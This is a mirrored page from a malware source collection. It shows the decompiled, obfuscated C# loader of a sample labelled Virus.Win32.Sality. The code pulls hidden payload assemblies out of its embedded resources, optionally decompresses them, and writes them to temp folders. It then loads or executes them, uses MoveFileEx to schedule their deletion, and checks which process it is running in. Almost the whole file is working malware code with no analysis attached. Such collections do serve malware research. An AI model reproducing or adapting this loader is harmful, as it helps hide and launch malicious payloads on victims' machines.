mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-11 21:05:28 +00:00
529 lines
16 KiB
C#
529 lines
16 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: .
|
|||
|
// Assembly: a5b7ee8e-cbdf-4eff-9144-efd0c433f3fe, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 97CE9FDF-0921-44CB-AE13-1E9A2A550F0F
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.Win32.Sality.sil-9eb937e4a3faa7c29e8cc85118a5c87d65f8716c89e5d1b13d7d7bc334ec8975.exe
|
|||
|
|
|||
|
using \u0001;
|
|||
|
using \u0002;
|
|||
|
using SmartAssembly.SmartExceptionsCore;
|
|||
|
using System;
|
|||
|
using System.Collections;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.IO;
|
|||
|
using System.Reflection;
|
|||
|
using System.Runtime.CompilerServices;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
using System.Text;
|
|||
|
using System.Threading;
|
|||
|
|
|||
|
namespace \u0002
|
|||
|
{
|
|||
|
internal sealed class \u0003
|
|||
|
{
|
|||
|
private static Hashtable \u0001;
|
|||
|
|
|||
|
[DllImport("kernel32", EntryPoint = "MoveFileEx")]
|
|||
|
private static extern bool \u0003([In] string obj0, [In] string obj1, [In] int obj2);
|
|||
|
|
|||
|
[SpecialName]
|
|||
|
internal static bool \u0003()
|
|||
|
{
|
|||
|
string lower;
|
|||
|
try
|
|||
|
{
|
|||
|
bool flag;
|
|||
|
try
|
|||
|
{
|
|||
|
lower = Process.GetCurrentProcess().MainModule.ModuleName.ToLower();
|
|||
|
if (lower == \u0006.\u0003(115))
|
|||
|
{
|
|||
|
flag = true;
|
|||
|
goto label_6;
|
|||
|
}
|
|||
|
else if (lower == \u0006.\u0003(128))
|
|||
|
{
|
|||
|
flag = true;
|
|||
|
goto label_6;
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
}
|
|||
|
return false;
|
|||
|
label_6:
|
|||
|
return flag;
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
string str = lower;
|
|||
|
bool flag;
|
|||
|
// ISSUE: variable of a boxed type
|
|||
|
__Boxed<bool> local = (ValueType) flag;
|
|||
|
throw UnhandledException.\u0003(ex, (object) str, (object) local);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
internal static void \u0003()
|
|||
|
{
|
|||
|
char[] chArray1;
|
|||
|
string[] strArray;
|
|||
|
int index;
|
|||
|
string s;
|
|||
|
string str1;
|
|||
|
string name;
|
|||
|
int num;
|
|||
|
string str2;
|
|||
|
bool flag;
|
|||
|
Stream manifestResourceStream;
|
|||
|
int length;
|
|||
|
byte[] buffer;
|
|||
|
string path1;
|
|||
|
\u0003.\u0001 obj;
|
|||
|
string path2;
|
|||
|
FileStream fileStream;
|
|||
|
try
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
AppDomain.CurrentDomain.AssemblyResolve += new ResolveEventHandler(\u0003.\u0003);
|
|||
|
if (!Assembly.GetExecutingAssembly().GlobalAssemblyCache || !\u0003.\u0003())
|
|||
|
return;
|
|||
|
string str3 = \u0006.\u0003(149);
|
|||
|
chArray1 = new char[1]{ ',' };
|
|||
|
char[] chArray2 = chArray1;
|
|||
|
strArray = str3.Split(chArray2);
|
|||
|
for (index = 0; index < strArray.Length - 1; index += 2)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
s = strArray[index];
|
|||
|
str1 = Encoding.UTF8.GetString(Convert.FromBase64String(s));
|
|||
|
name = strArray[index + 1];
|
|||
|
if (name.Length > 0)
|
|||
|
{
|
|||
|
if (name[0] == '[')
|
|||
|
{
|
|||
|
num = name.IndexOf(']');
|
|||
|
str2 = name.Substring(1, num - 1);
|
|||
|
name = name.Substring(num + 1);
|
|||
|
flag = str2.IndexOf('z') >= 0;
|
|||
|
if (str2.IndexOf('f') >= 0)
|
|||
|
{
|
|||
|
manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(name);
|
|||
|
if (manifestResourceStream != null)
|
|||
|
{
|
|||
|
length = (int) manifestResourceStream.Length;
|
|||
|
buffer = new byte[length];
|
|||
|
manifestResourceStream.Read(buffer, 0, length);
|
|||
|
if (flag)
|
|||
|
buffer = \u0006.\u0003(buffer);
|
|||
|
try
|
|||
|
{
|
|||
|
path1 = string.Format(\u0006.\u0003(367), (object) Path.GetTempPath(), (object) name);
|
|||
|
Directory.CreateDirectory(path1);
|
|||
|
obj = new \u0003.\u0001(str1);
|
|||
|
path2 = path1 + obj.\u0001 + \u0006.\u0003(380);
|
|||
|
if (!File.Exists(path2))
|
|||
|
{
|
|||
|
fileStream = File.OpenWrite(path2);
|
|||
|
fileStream.Write(buffer, 0, buffer.Length);
|
|||
|
fileStream.Close();
|
|||
|
}
|
|||
|
\u0004.\u0003(path2);
|
|||
|
try
|
|||
|
{
|
|||
|
File.Delete(path2);
|
|||
|
Directory.Delete(path1);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
object[] objArray = new object[16]
|
|||
|
{
|
|||
|
(object) strArray,
|
|||
|
(object) index,
|
|||
|
(object) s,
|
|||
|
(object) str1,
|
|||
|
(object) name,
|
|||
|
(object) num,
|
|||
|
(object) str2,
|
|||
|
(object) flag,
|
|||
|
(object) manifestResourceStream,
|
|||
|
(object) length,
|
|||
|
(object) buffer,
|
|||
|
(object) path1,
|
|||
|
(object) obj,
|
|||
|
(object) path2,
|
|||
|
(object) fileStream,
|
|||
|
(object) chArray1
|
|||
|
};
|
|||
|
throw UnhandledException.\u0003(ex, objArray);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
internal static Assembly \u0003([In] object obj0, [In] ResolveEventArgs obj1)
|
|||
|
{
|
|||
|
\u0003.\u0001 obj;
|
|||
|
string s;
|
|||
|
string base64String;
|
|||
|
char[] chArray1;
|
|||
|
string[] strArray;
|
|||
|
string str1;
|
|||
|
bool flag1;
|
|||
|
bool flag2;
|
|||
|
bool flag3;
|
|||
|
int index1;
|
|||
|
int index2;
|
|||
|
int num;
|
|||
|
string str2;
|
|||
|
Hashtable hashtable1;
|
|||
|
Assembly assembly1;
|
|||
|
Stream manifestResourceStream;
|
|||
|
int length;
|
|||
|
byte[] numArray;
|
|||
|
string path1;
|
|||
|
string path2;
|
|||
|
Assembly assembly2;
|
|||
|
FileStream fileStream1;
|
|||
|
Hashtable hashtable2;
|
|||
|
Assembly assembly3;
|
|||
|
string path3;
|
|||
|
string path4;
|
|||
|
FileStream fileStream2;
|
|||
|
Hashtable hashtable3;
|
|||
|
try
|
|||
|
{
|
|||
|
obj = new \u0003.\u0001(obj1.Name);
|
|||
|
s = obj.\u0003(false);
|
|||
|
base64String = Convert.ToBase64String(Encoding.UTF8.GetBytes(s));
|
|||
|
string str3 = \u0006.\u0003(149);
|
|||
|
chArray1 = new char[1]{ ',' };
|
|||
|
char[] chArray2 = chArray1;
|
|||
|
strArray = str3.Split(chArray2);
|
|||
|
str1 = string.Empty;
|
|||
|
flag1 = false;
|
|||
|
flag2 = false;
|
|||
|
flag3 = false;
|
|||
|
for (index1 = 0; index1 < strArray.Length - 1; index1 += 2)
|
|||
|
{
|
|||
|
if (strArray[index1] == base64String)
|
|||
|
{
|
|||
|
str1 = strArray[index1 + 1];
|
|||
|
break;
|
|||
|
}
|
|||
|
}
|
|||
|
if (str1.Length == 0 && obj.\u0003.Length == 0)
|
|||
|
{
|
|||
|
base64String = Convert.ToBase64String(Encoding.UTF8.GetBytes(obj.\u0001));
|
|||
|
for (index2 = 0; index2 < strArray.Length - 1; index2 += 2)
|
|||
|
{
|
|||
|
if (strArray[index2] == base64String)
|
|||
|
{
|
|||
|
str1 = strArray[index2 + 1];
|
|||
|
break;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
if (str1.Length > 0)
|
|||
|
{
|
|||
|
if (str1[0] == '[')
|
|||
|
{
|
|||
|
num = str1.IndexOf(']');
|
|||
|
str2 = str1.Substring(1, num - 1);
|
|||
|
flag1 = str2.IndexOf('z') >= 0;
|
|||
|
flag2 = str2.IndexOf('g') >= 0;
|
|||
|
flag3 = str2.IndexOf('t') >= 0;
|
|||
|
str1 = str1.Substring(num + 1);
|
|||
|
}
|
|||
|
Monitor.Enter((object) (hashtable1 = \u0003.\u0001));
|
|||
|
try
|
|||
|
{
|
|||
|
if (\u0003.\u0001.ContainsKey((object) str1))
|
|||
|
{
|
|||
|
assembly1 = (Assembly) \u0003.\u0001[(object) str1];
|
|||
|
goto label_47;
|
|||
|
}
|
|||
|
}
|
|||
|
finally
|
|||
|
{
|
|||
|
Monitor.Exit((object) hashtable1);
|
|||
|
}
|
|||
|
manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(str1);
|
|||
|
if (manifestResourceStream != null)
|
|||
|
{
|
|||
|
length = (int) manifestResourceStream.Length;
|
|||
|
numArray = new byte[length];
|
|||
|
manifestResourceStream.Read(numArray, 0, length);
|
|||
|
if (flag1)
|
|||
|
numArray = \u0006.\u0003(numArray);
|
|||
|
if (flag2)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
path1 = string.Format(\u0006.\u0003(367), (object) Path.GetTempPath(), (object) str1);
|
|||
|
Directory.CreateDirectory(path1);
|
|||
|
path2 = path1 + obj.\u0001 + \u0006.\u0003(380);
|
|||
|
if (!File.Exists(path2))
|
|||
|
{
|
|||
|
assembly2 = (Assembly) null;
|
|||
|
fileStream1 = File.OpenWrite(path2);
|
|||
|
fileStream1.Write(numArray, 0, numArray.Length);
|
|||
|
fileStream1.Close();
|
|||
|
if (\u0004.\u0003(path2))
|
|||
|
assembly2 = Assembly.Load(obj.\u0003(true));
|
|||
|
File.Delete(path2);
|
|||
|
Directory.Delete(path1);
|
|||
|
if ((object) assembly2 != null)
|
|||
|
{
|
|||
|
Monitor.Enter((object) (hashtable2 = \u0003.\u0001));
|
|||
|
try
|
|||
|
{
|
|||
|
if (\u0003.\u0001.ContainsKey((object) str1))
|
|||
|
assembly2 = (Assembly) \u0003.\u0001[(object) str1];
|
|||
|
else
|
|||
|
\u0003.\u0001.Add((object) str1, (object) assembly2);
|
|||
|
}
|
|||
|
finally
|
|||
|
{
|
|||
|
Monitor.Exit((object) hashtable2);
|
|||
|
}
|
|||
|
assembly1 = assembly2;
|
|||
|
goto label_47;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
assembly3 = (Assembly) null;
|
|||
|
if (!flag3)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
assembly3 = Assembly.Load(numArray);
|
|||
|
}
|
|||
|
catch (FileLoadException ex)
|
|||
|
{
|
|||
|
flag3 = true;
|
|||
|
}
|
|||
|
catch (BadImageFormatException ex)
|
|||
|
{
|
|||
|
flag3 = true;
|
|||
|
}
|
|||
|
}
|
|||
|
if (flag3)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
path3 = string.Format(\u0006.\u0003(367), (object) Path.GetTempPath(), (object) str1);
|
|||
|
Directory.CreateDirectory(path3);
|
|||
|
path4 = path3 + obj.\u0001 + \u0006.\u0003(380);
|
|||
|
if (!File.Exists(path4))
|
|||
|
{
|
|||
|
fileStream2 = File.OpenWrite(path4);
|
|||
|
fileStream2.Write(numArray, 0, numArray.Length);
|
|||
|
fileStream2.Close();
|
|||
|
\u0003.\u0003(path4, (string) null, 4);
|
|||
|
\u0003.\u0003(path3, (string) null, 4);
|
|||
|
}
|
|||
|
assembly3 = Assembly.LoadFile(path4);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
Monitor.Enter((object) (hashtable3 = \u0003.\u0001));
|
|||
|
try
|
|||
|
{
|
|||
|
\u0003.\u0001.Add((object) str1, (object) assembly3);
|
|||
|
}
|
|||
|
finally
|
|||
|
{
|
|||
|
Monitor.Exit((object) hashtable3);
|
|||
|
}
|
|||
|
return assembly3;
|
|||
|
}
|
|||
|
goto label_46;
|
|||
|
label_47:
|
|||
|
return assembly1;
|
|||
|
}
|
|||
|
label_46:
|
|||
|
return (Assembly) null;
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
object[] objArray = new object[30]
|
|||
|
{
|
|||
|
(object) obj,
|
|||
|
(object) s,
|
|||
|
(object) base64String,
|
|||
|
(object) strArray,
|
|||
|
(object) str1,
|
|||
|
(object) flag1,
|
|||
|
(object) flag2,
|
|||
|
(object) flag3,
|
|||
|
(object) index1,
|
|||
|
(object) index2,
|
|||
|
(object) num,
|
|||
|
(object) str2,
|
|||
|
(object) manifestResourceStream,
|
|||
|
(object) length,
|
|||
|
(object) numArray,
|
|||
|
(object) path1,
|
|||
|
(object) path2,
|
|||
|
(object) assembly2,
|
|||
|
(object) fileStream1,
|
|||
|
(object) assembly3,
|
|||
|
(object) path3,
|
|||
|
(object) path4,
|
|||
|
(object) fileStream2,
|
|||
|
(object) assembly1,
|
|||
|
(object) chArray1,
|
|||
|
(object) hashtable1,
|
|||
|
(object) hashtable2,
|
|||
|
(object) hashtable3,
|
|||
|
obj0,
|
|||
|
(object) obj1
|
|||
|
};
|
|||
|
throw UnhandledException.\u0003(ex, objArray);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public \u0003()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
throw UnhandledException.\u0003(ex, (object) this);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
static \u0003()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
\u0003.\u0001 = new Hashtable();
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
throw UnhandledException.\u0003(ex);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
internal struct \u0001
|
|||
|
{
|
|||
|
public string \u0001;
|
|||
|
public Version \u0001;
|
|||
|
public string \u0002;
|
|||
|
public string \u0003;
|
|||
|
|
|||
|
public string \u0003([In] bool obj0)
|
|||
|
{
|
|||
|
StringBuilder stringBuilder1;
|
|||
|
try
|
|||
|
{
|
|||
|
stringBuilder1 = new StringBuilder();
|
|||
|
stringBuilder1.Append(this.\u0001);
|
|||
|
if (obj0)
|
|||
|
{
|
|||
|
stringBuilder1.Append(\u0006.\u0003(389));
|
|||
|
stringBuilder1.Append((object) this.\u0001);
|
|||
|
}
|
|||
|
stringBuilder1.Append(\u0006.\u0003(406));
|
|||
|
stringBuilder1.Append(this.\u0002.Length == 0 ? \u0006.\u0003(423) : this.\u0002);
|
|||
|
stringBuilder1.Append(\u0006.\u0003(436));
|
|||
|
stringBuilder1.Append(this.\u0003.Length == 0 ? \u0006.\u0003(461) : this.\u0003);
|
|||
|
return stringBuilder1.ToString();
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
StringBuilder stringBuilder2 = stringBuilder1;
|
|||
|
// ISSUE: variable of a boxed type
|
|||
|
__Boxed<\u0003.\u0001> local1 = (ValueType) this;
|
|||
|
// ISSUE: variable of a boxed type
|
|||
|
__Boxed<bool> local2 = (ValueType) obj0;
|
|||
|
throw UnhandledException.\u0003(ex, (object) stringBuilder2, (object) local1, (object) local2);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
public \u0001([In] string obj0)
|
|||
|
{
|
|||
|
char[] chArray1;
|
|||
|
string[] strArray1;
|
|||
|
int index;
|
|||
|
string str1;
|
|||
|
string str2;
|
|||
|
try
|
|||
|
{
|
|||
|
this.\u0001 = new Version();
|
|||
|
this.\u0002 = string.Empty;
|
|||
|
this.\u0003 = string.Empty;
|
|||
|
this.\u0001 = string.Empty;
|
|||
|
string str3 = obj0;
|
|||
|
chArray1 = new char[1]{ ',' };
|
|||
|
char[] chArray2 = chArray1;
|
|||
|
strArray1 = str3.Split(chArray2);
|
|||
|
for (index = 0; index < strArray1.Length; ++index)
|
|||
|
{
|
|||
|
str1 = strArray1[index];
|
|||
|
str2 = str1.Trim();
|
|||
|
if (str2.StartsWith(\u0006.\u0003(470)))
|
|||
|
this.\u0001 = new Version(str2.Substring(8));
|
|||
|
else if (str2.StartsWith(\u0006.\u0003(483)))
|
|||
|
{
|
|||
|
this.\u0002 = str2.Substring(8);
|
|||
|
if (this.\u0002 == \u0006.\u0003(423))
|
|||
|
this.\u0002 = string.Empty;
|
|||
|
}
|
|||
|
else if (str2.StartsWith(\u0006.\u0003(496)))
|
|||
|
{
|
|||
|
this.\u0003 = str2.Substring(15);
|
|||
|
if (this.\u0003 == \u0006.\u0003(461))
|
|||
|
this.\u0003 = string.Empty;
|
|||
|
}
|
|||
|
else
|
|||
|
this.\u0001 = str2;
|
|||
|
}
|
|||
|
}
|
|||
|
catch (Exception ex)
|
|||
|
{
|
|||
|
string str4 = str1;
|
|||
|
string str5 = str2;
|
|||
|
char[] chArray3 = chArray1;
|
|||
|
string[] strArray2 = strArray1;
|
|||
|
// ISSUE: variable of a boxed type
|
|||
|
__Boxed<int> local1 = (ValueType) index;
|
|||
|
// ISSUE: variable of a boxed type
|
|||
|
__Boxed<\u0003.\u0001> local2 = (ValueType) this;
|
|||
|
string str6 = obj0;
|
|||
|
throw UnhandledException.\u0003(ex, (object) str4, (object) str5, (object) chArray3, (object) strArray2, (object) local1, (object) local2, (object) str6);
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|